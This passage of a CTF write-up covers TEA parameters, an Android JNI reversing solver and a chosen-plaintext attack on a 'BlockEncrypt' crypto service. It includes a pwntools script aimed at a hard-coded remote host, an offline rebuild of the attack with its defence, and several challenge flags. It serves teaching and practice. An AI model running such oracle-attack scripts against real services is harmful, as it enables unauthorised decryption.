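    ct = tea_encrypt(pt, key)
    print(ct.hex(), tea_decrypt(ct, key))
```

Before trusting the textbook version against a CTF binary, compare three things in the disassembly: the delta (often written as its negative 0x61C88647 and subtracted), the round count (the loop bound, 32 here but frequently 16 or 64), and the byte order used when the input is split into 32-bit words; all three are parameters above. XTEA and XXTEA look similar at a glance but mix the key differently.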
The script follows:
The flag is:
flag{0f4d0db3-668d-d58c-abb9-eb409657eaa8}
hello

The app calls into JNI.
String2 can be found through logging.
The .so code:
The script follows:

# raw_sign is the APK signature string; it is not reproduced on the page
raw_sign = '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'
enc = [0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE, 0x6B, 0x84, 0xA2, 0x6D,
       0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9, 0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85,
       0xCF, 0xA9, 0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77, 0xE0, 0x64]
for i in range(0, 42):
    # rotate each byte left by 3 (undoing the rotate-right in the native code)
    enc[i] = (enc[i] << 3 & 0xff) + (enc[i] >> 5 & 0xff)
flag = ""
for i in range(len(enc)):
    index = i * 27 + 327            # every 27th character of the signature, from offset 327
    magic = ord(raw_sign[index]) + i
    flag += chr(magic ^ enc[i])
print(flag)
The flag is:
flag{d5577edd-8211-7a0e-f23a-305b0b10683f}
Crypto

BlockEncrypt

Decompiling gives an incomplete encryption routine that turns out to be AES. The service encrypts chosen plaintext for us, and the ciphertext byte at position t only depends on the plaintext byte at position t, so the flag can be recovered one byte at a time by comparing against the encrypted flag.
The script follows:

from pwn import *
import hashlib

s = "flag{abcdef0123456789-}"   # characters the flag can contain

def f(a, b):
    """Proof of work: find 4 characters X with sha256(X + a) == b."""
    m = []
    for i in range(10):
        m.append(str(i))
    for i in range(26):
        m.append(chr(i + 0x41))
        m.append(chr(i + 0x61))
    for i in m:
        for j in m:
            for k in m:
                for p in m:
                    t = i + j + k + p + a
                    if hashlib.sha256(t.encode()).hexdigest() == b:
                        print("find")
                        return t[:4]

sh = remote("47.104.183.8", "47971")
sh.recvuntil(b"X+")
a = sh.recvuntil(b")", drop=True).decode()
sh.recvuntil(b"== ")
b = sh.recvuntil(b"\n", drop=True).decode()
sh.send(f(a, b).encode())
sh.recv()
print(sh.recv().decode())

# Option 1: fetch the encrypted flag
sh.send(b'1')
sh.recv()
sh.recvuntil(b"\n", drop=True)
flag = sh.recvuntil(b"\n[+]", drop=True)
print()

# Option 2: encrypt chosen plaintext; extend the known prefix by whichever
# character makes ciphertext byte t match the encrypted flag at t
t = 0
r = ""
while 1:
    for i in s:
        m = r + i
        m = m.encode()
        sh.send(b'2')
        sh.send(m)
        sh.recv()
        sh.recv()
        sh.recvuntil(b"CipherText:", drop=True)
        c = sh.recvuntil(b"\n[+]", drop=True)
        if c[t] == flag[t]:
            r = r + i
            t += 1
            print(r)
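Both steps of the script above, the proof of work and the byte-at-a-time recovery, as an offline added example (not the writeup's code). The byte-wise comparison works only because the server reuses the same keystream for every query, so ciphertext byte t depends on plaintext byte t alone; the oracle below is a constructed stand-in for the challenge's AES that has exactly that property (SHA-256 in counter mode with a fixed key and no nonce), so the attack logic can be checked without the server. With AES-ECB the same script would not work, since any change inside a block changes the whole block.

```python
import hashlib
import itertools
import string

FLAG_CHARSET = "flag{abcdef0123456789-}"
POW_ALPHABET = string.digits + string.ascii_letters


def pow_target(prefix: str, suffix: str) -> str:
    """The server-side value: sha256(prefix + suffix) as hex."""
    return hashlib.sha256((prefix + suffix).encode()).hexdigest()


def solve_pow(suffix: str, target_hex: str, length: int = 4,
              alphabet: str = POW_ALPHABET):
    """Brute-force the prefix X of `length` chars with sha256(X + suffix) == target."""
    for cand in itertools.product(alphabet, repeat=length):
        x = "".join(cand)
        if pow_target(x, suffix) == target_hex:
            return x
    return None


class FixedKeystreamOracle:
    """Constructed stand-in for the challenge server: a stream cipher that reuses
    its keystream for every query (fixed key, no nonce)."""

    def __init__(self, key: bytes, secret: bytes):
        self._key = key
        self._secret = secret

    def _keystream(self, n: int) -> bytes:
        out = b""
        block = 0
        while len(out) < n:
            out += hashlib.sha256(self._key + block.to_bytes(8, "big")).digest()
            block += 1
        return out[:n]

    def encrypt(self, plaintext: bytes) -> bytes:      # server option 2
        ks = self._keystream(len(plaintext))
        return bytes(p ^ k for p, k in zip(plaintext, ks))

    def encrypted_flag(self) -> bytes:                 # server option 1
        return self.encrypt(self._secret)


def recover_flag(oracle, charset: str = FLAG_CHARSET) -> str:
    """Byte-at-a-time: for each position t, the charset byte whose ciphertext
    matches the encrypted flag at t is the flag byte at t."""
    target = oracle.encrypted_flag()
    known = ""
    for t in range(len(target)):
        for ch in charset:
            if oracle.encrypt((known + ch).encode())[t] == target[t]:
                known += ch
                break
        else:
            raise ValueError(f"no charset byte matched at position {t}")
    return known


if __name__ == "__main__":
    print(solve_pow("abc", pow_target("Zz", "abc"), length=2))
    oracle = FixedKeystreamOracle(b"constructed-key", b"flag{ab-12}")
    print(recover_flag(oracle))
```

The number of oracle queries is at most len(charset) per flag byte (23 per byte here) instead of 23^n for the whole flag, which is why the attack finishes interactively; the defence is a fresh nonce or IV per encryption so no two queries share keystream.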
The flag is:
flag{ad7e9276-de18-52b8-8c1c-3db559274f2d}